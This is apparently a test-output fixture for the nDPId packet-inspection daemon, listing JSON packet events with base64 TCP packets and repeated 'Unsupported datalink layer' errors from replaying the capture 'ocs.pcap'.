-00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":801,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOMQABABn9dwKi0ArL40DbC2QBQ64tGkd701JuAEC+sn9cAAAEBCAoANZTvRwYqXQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":802,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833553} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":802,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMONQABABn9cwKi0ArL40DbC2QBQ64tGkd702geAEC\/qmiwAAAEBCAoANZTvRwYqXg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":803,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833622} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":803,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOOQABABn9PwKi0ArL40DbC2QBQ64tGkd702gewEC\/q1vgAAAEBCAoANZT2RwYqXgEBBQre9OTf3vTqSw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":804,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833935} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":804,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOPQABABn9OwKi0ArL40DbC2QBQ64tGkd7033OwEC\/q0RIAAAEBCAoANZUVRwYquQEBBQre9OTf3vTqSw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":805,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833993} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":805,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMOQQABABn9FwKi0ArL40DbC2QBQ64tGkd7033PQEC\/qDjcAAAEBCAoANZUbRwYquQEBBRLe9O+33vT1I9705N\/e9OpL"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":806,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833995} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":806,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMORQABABn9EwKi0ArL40DbC2QBQ64tGkd7033PQEC\/qCMoAAAEBCAoANZUcRwYquQEBBRLe9O+33vT6j9705N\/e9OpL"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":807,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652834052} -00359{"packet_event_id":1,"packet_event_name":"packet","packet_id":807,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":80,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":80,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAUMOSQABABn87wKi0ArL40DbC2QBQ64tGkd7033PwEC\/qOxcAAAEBCAoANZUhRwYquQEBBRre9PUj3vT6j97077fe9PqP3vTk39706ks="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":808,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652834446} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":808,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOTQABABn9KwKi0ArL40DbC2QBQ64tGkd706kuwEC\/BqqUAAAEBCAoANZVJRwYrJwEBBQre9O+33vT6jw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":809,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652834534} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":809,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMOUQABABn9BwKi0ArL40DbC2QBQ64tGkd706kvQEC\/BvGcAAAEBCAoANZVRRwYrJwEBBRLe9QVn3vUK097077fe9PqP"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":810,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652834958} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":810,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOVQABABn9IwKi0ArL40DbC2QBQ64tGkd70+o+wEC\/Bc7AAAAEBCAoANZV8RwYrsQEBBQre9QVn3vUK0w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":811,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652834985} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":811,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOWQABABn9HwKi0ArL40DbC2QBQ64tGkd70+o+wEC\/Wbi0AAAEBCAoANZV+RwYrsQEBBQre9QVn3vUQPw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":812,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652834986} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":812,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOXQABABn9GwKi0ArL40DbC2QBQ64tGkd70+o+wEC\/WaMAAAAEBCAoANZV\/RwYrsQEBBQre9QVn3vUVqw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":813,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835015} -00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":813,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOYQABABn9FwKi0ArL40DbC2QBQ64tGkd70\/\/uwEC\/BY0AAAAEBCAoANZWBRwYr2AEBBQre9QVn3vUVqw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":814,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835017} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":814,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOZQABABn9QwKi0ArL40DbC2QBQ64tGkd71FauAEC+sXLoAAAEBCAoANZWBRwYr2A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":815,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835017} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":815,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOaQABABn9DwKi0ArL40DbC2QBQ64tGkd71FauwEC+sQs0AAAEBCAoANZWBRwYr2AEBBQre9RA\/3vUVqw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":816,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835017} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":816,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMObQABABn9OwKi0ArL40DbC2QBQ64tGkd71GxeAEC+XV2IAAAEBCAoANZWCRwYr2A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":817,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835040} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":817,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOcQABABn9NwKi0ArL40DbC2QBQ64tGkd71IIOAEC\/qUZkAAAEBCAoANZWERwYr4A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":818,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835042} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":818,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOdQABABn9MwKi0ArL40DbC2QBQ64tGkd71Je+AEC\/WTEEAAAEBCAoANZWERwYr4A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":819,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835045} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":819,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOeQABABn9LwKi0ArL40DbC2QBQ64tGkd71K1uAEC\/BRugAAAEBCAoANZWFRwYr4Q=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":820,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835064} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":820,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOfQABABn9KwKi0ArL40DbC2QBQ64tGkd71MMeAEC\/qQU0AAAEBCAoANZWHRwYr5Q=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":821,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835066} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":821,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOgQABABn9JwKi0ArL40DbC2QBQ64tGkd71NjOAEC\/qO+AAAAEBCAoANZWHRwYr5g=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":822,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835069} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":822,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOhQABABn9IwKi0ArL40DbC2QBQ64tGkd71O5+AEC\/qNnMAAAEBCAoANZWHRwYr5w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":823,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835091} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":823,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOiQABABn9HwKi0ArL40DbC2QBQ64tGkd71QQuAEC\/qMQAAAAEBCAoANZWJRwYr7A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":824,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835093} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":824,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOjQABABn9GwKi0ArL40DbC2QBQ64tGkd71RneAEC\/qK5QAAAEBCAoANZWJRwYr7A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":825,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835095} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":825,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOkQABABn9FwKi0ArL40DbC2QBQ64tGkd71S+OAEC\/WJjsAAAEBCAoANZWKRwYr7A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":826,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835097} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":826,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOlQABABn9EwKi0ArL40DbC2QBQ64tGkd71UU+AEC\/BIOMAAAEBCAoANZWKRwYr7Q=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":827,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835117} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":827,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOmQABABn9DwKi0ArL40DbC2QBQ64tGkd71VruAEC\/qG0cAAAEBCAoANZWMRwYr8g=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":828,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835118} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":828,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOnQABABn9CwKi0ArL40DbC2QBQ64tGkd71XCeAEC\/WFe4AAAEBCAoANZWMRwYr8w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":829,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835122} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":829,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOoQABABn9BwKi0ArL40DbC2QBQ64tGkd71YZOAEC\/BEJcAAAEBCAoANZWMRwYr8w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":830,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835123} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":830,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOpQABABn9AwKi0ArL40DbC2QBQ64tGkd71Zv+AEC+sCz8AAAEBCAoANZWMRwYr9A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":831,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835149} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":831,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOqQABABn8\/wKi0ArL40DbC2QBQ64tGkd71cdeAEC\/qACYAAAEBCAoANZWPRwYr9A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":832,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835154} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":832,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOrQABABn8+wKi0ArL40DbC2QBQ64tGkd71fK+AEC\/q9UYAAAEBCAoANZWQRwYr+g=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":833,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835194} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":833,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOsQABABn89wKi0ArL40DbC2QBQ64tGkd71ghuAEC\/q79UAAAEBCAoANZWURwYr+w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":834,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835242} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":834,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOtQABABn8wwKi0ArL40DbC2QBQ64tGkd71ghuwEC\/qxssAAAEBCAoANZWYRwYr+wEBBQre9ZfL3vWdNw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":835,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835279} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":835,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOuQABABn8vwKi0ArL40DbC2QBQ64tGkd71h4ewEC\/qwT4AAAEBCAoANZWcRwYsGAEBBQre9ZfL3vWdNw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":836,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652835337} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":836,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOvQABABn8uwKi0ArL40DbC2QBQ64tGkd71jPOwEC\/qu8IAAAEBCAoANZWiRwYsIgEBBQre9ZfL3vWdNw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":837,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652836187} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":837,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOwQABABn8twKi0ArL40DbC2QBQ64tGkd71kl+wEC\/qtTMAAAEBCAoANZX3RwYs8AEBBQre9ZfL3vWdNw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":838,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652836225} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":838,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMOxQABABn8kwKi0ArL40DbC2QBQ64tGkd71kl\/QEC\/qjIAAAAEBCAoANZX7RwYs8AEBBRLe9aKj3vWoD971l8ve9Z03"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":839,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652836225} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":839,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMOyQABABn8jwKi0ArL40DbC2QBQ64tGkd71kl\/QEC\/qhxQAAAEBCAoANZX7RwYs8AEBBRLe9aKj3vWte971l8ve9Z03"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":840,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652836296} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":840,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOzQABABn8qwKi0ArL40DbC2QBQ64tGkd71nTewEC\/Bjz8AAAEBCAoANZYCRwYtDgEBBQre9aKj3vWtew=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":841,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652836296} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":841,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMO0QABABn8hwKi0ArL40DbC2QBQ64tGkd71nTfQEC\/BW7gAAAEBCAoANZYCRwYtDgEBBRLe9agP3vWte971oqPe9a17"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":842,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652836298} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":842,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMO1QABABn8owKi0ArL40DbC2QBQ64tGkd71nTewEC\/BidMAAAEBCAoANZYCRwYtDgEBBQre9aKj3vWy5w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":843,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652836348} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":843,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMO2QABABn8nwKi0ArL40DbC2QBQ64tGkd71nTewEC\/BhGIAAAEBCAoANZYHRwYtDgEBBQre9aKj3vW4Uw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":844,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652836350} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":844,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMO3QABABn8mwKi0ArL40DbC2QBQ64tGkd71nTewEC\/BfvYAAAEBCAoANZYHRwYtDgEBBQre9aKj3vW9vw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":845,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652836356} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":845,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMO4QABABn8lwKi0ArL40DbC2QBQ64tGkd71nTewEC\/BeYkAAAEBCAoANZYIRwYtDgEBBQre9aKj3vXDKw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":846,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652836418} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":846,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMO5QABABn8kwKi0ArL40DbC2QBQ64tGkd71nTewEC\/BdBcAAAEBCAoANZYORwYtDgEBBQre9aKj3vXIlw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":847,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652836488} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":847,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMO6QABABn8bwKi0ArL40DbC2QBQ64tGkd71nTfQEC\/B6cgAAAEBCAoANZYVRwYtDgEBBRLe9dNv3vXY2971oqPe9ciX"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":848,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652836587} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":848,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMO7QABABn8awKi0ArL40DbC2QBQ64tGkd71nTfQEC\/B5FIAAAEBCAoANZYfRwYtDgEBBRLe9dNv3vXeR971oqPe9ciX"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":849,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652837211} 